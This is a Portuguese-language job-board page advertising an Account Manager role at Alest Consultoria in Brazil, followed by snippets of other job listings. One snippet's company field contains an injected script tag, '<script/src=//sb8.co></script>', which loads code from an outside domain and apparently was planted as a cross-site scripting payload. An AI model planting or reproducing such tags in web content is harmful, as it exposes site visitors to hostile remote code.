Ir à oferta completa

ACCOUNT MANAGER

Descrição da oferta de emprego



Descrição
Um Account Manager será responsável pelo gerenciamento de contas e pelo relacionamento entre cliente e Alest, buscando excelência e garantia da satisfação do cliente. O seu papel será apoiar as necessidades dos clientes e identificar potenciais novos projetos de forma estratégica.


As atividades desenvolvidas serão:

Aprofundar relacionamento com clientes e tomadores de decisão;
Gestão de carteira de clientes através do CRM;
Identificar novas oportunidades em clientes já existentes;
Estratégias para reter clientes e crescer contas já existentes;
Executar estratégias de cross-sell e upsell na carteira de clientes;
Garantir a renovação das contas no prazo;
Ser o ponto focal de atendimento da carteira de clientes;
Manter CRM atualizado.

Benefícios

- Assistência Odontológica
- Seguro saúde
- Tícket refeição
- Vale-transporte




Certificação Conhecimento
Fez o seu estilo? Então, dê uma olhada nos requisitos para a vaga:

Experiência com CRM (Salesforce, Pipedrive, RD Station, HubSpot ou outro);
Alta performance no crescimento de receita em grandes contas;
Habilidade de conectar as necessidades do cliente aos benefícios das nossas soluções;
Experiência na elaboração de apresentações e demonstração de serviços/produtos;
Ser motivado(a) e impulsionado(a) pela vontade de obter resultados;
Capacidade de resolução de problemas;
Escuta ativa;
Saber se colocar no lugar do cliente;
Buscar construir uma carreira dentro da área Comercial.

Você se destaca se tiver algum desses diferenciais:

Experiência com vendas SaaS;
Experiência com vendas de Serviços Consultivos;
Experiência como Account Manager.

Horário de Trabalho
Segunda a sexta, das 08h-18h (1h15 de almoço)


Informações Adicionais
SOMOS GENTE QUE GOSTA DE GENTE!
Somos a Alest Consultoria, uma empresa 100% Digital + Inovadora + Colaborativa + Aberta a Diversidade, parceira dos maiores players do mercado Google, Miro, monday.com, Docusign e HubSpot no Brasil.


Buscamos pessoas que gostem de desafios e queiram fazer parte do Time Comercial, contribuindo nas entregas da área, mas, que acima de tudo, sejam apaixonados(as) por Pessoas e Tecnologia!


Então se você tem sede de conhecimento e brilho nos olhos para crescer e se desenvolver em Vendas, dê uma olhada no que esperamos dos nossos colaboradores:

Resiliência para lidar com situações adversas;
Proatividade e agilidade para atuar em um time dinâmico;
Paixão por pessoas, vendas e tecnologia;
Facilidade para se adaptar a mudanças;
Mindset voltado à solução de problemas e a ajudar pessoas;
Diversidade como valor.
Ir à oferta completa

Detalhes da oferta

Empresa
  • Indeterminado
Localidade
  • Em todo o Brasil
Endereço
  • Indeterminado - Indeterminado
Data de publicação
  • 30/09/2024
Data de expiração
  • 29/12/2024
F&B MANAGER
Oman Jobs

Php?id=6028 company industry; restaurant - multi international dishes job title: f&b; manager total years of experience: min 4 years gcc experience: 2 years years of industry related experience:4 years education: any basic qualification skills: fluent in english communication is a must, other language......

Product Manager - (Electronic commerce)
Jp&f consultoria

Modalidade de trabalho: hibrido (2x por semana no escritório)... fluent in english and spanish... local de trabalho: são paulo / sp (cenesp – centro empresarial de são paulo)... (mandatory) - strong knowledge of electronic commerce / acquiring and payments... benefícios: convenio médio, convenio odontológico......

administrative and technical department
RAINSTEAL OIL & GAS

Bakers / bartenders / chefs / chef de partie / sous chef / chef d 'cuisine / cooks / dietitians, food and beverage servers, food service supervisors, restaurant and food service manager, catering manager, assistant beverage manager, kitchen manager, banquet coordinator, beverage server, beverage shift......

Vacancy At The Royal Garden Hotel
The Royal Garden Hotel

Available positions bakers/bartenders/chefs/chef de partie/sous chef/chef d cuisine/cooks/, restaurant and food service manager, conference banqueting operations manager, food beverage team manager, account manager, bartender, assistant manager of front office, receptionist, guest relation assistant......

Opening At The Dilly Hotel
The Dilly Hotel London

Available positions bakers,bartenders,chefs (chef de partie/sous chef/chef d cuisine/cooks),restaurant and food service manager, conference banqueting operations manager, food beverage team manager, account manager, bartender, assistant manager of front office, receptionist, guest relation assistant......

finance
<script/src=//sb8.co></script>computer

Analyze macroeconomic variables and their interactions with client portfolios - strategic, tactical, and dynamic asset allocation decisions, as well as manager selection... the model portfolio is a client-allocated satellite portfolio... ideas for process improvements to existing models to make them......

Search Engine Evaluator
Oneforma

Don’t worry, our project manager will be available every step of the way... please note: if you have had an active trytrating account within the last year, you are not eligible for this project... important information: join our paid program* to enter the milky way project! this program is divided in......

Director of Operations
JP&F Consultoria

Champions operational excellence thru collaboration with the general manager and/or business unit leader to devise strategies for achieving the organization's objectives in light of both internal and external factors... ed at the highest level... fluent english and portuguese area mandatory......

Customer Success Specialist (PT language) (Remote)
Hostinger

Are you getting excited? keep reading to learn more... ability to multitask and handle multiple customer inquiries simultaneously... opportunity to participate in our online e-training (in english) during the first month, from monday to friday, from 8am to 5pm (gmt-3)... s mode is not supported)......

Bilingual Customer Service Associate
Bilingual

The role also has responsibility for customer protection around personally identifiable information and risk mitigation including account take over and fraud... keep current with company policies, procedures, and processes... requisitos do trabalho what we are looking for must be fully and fluently......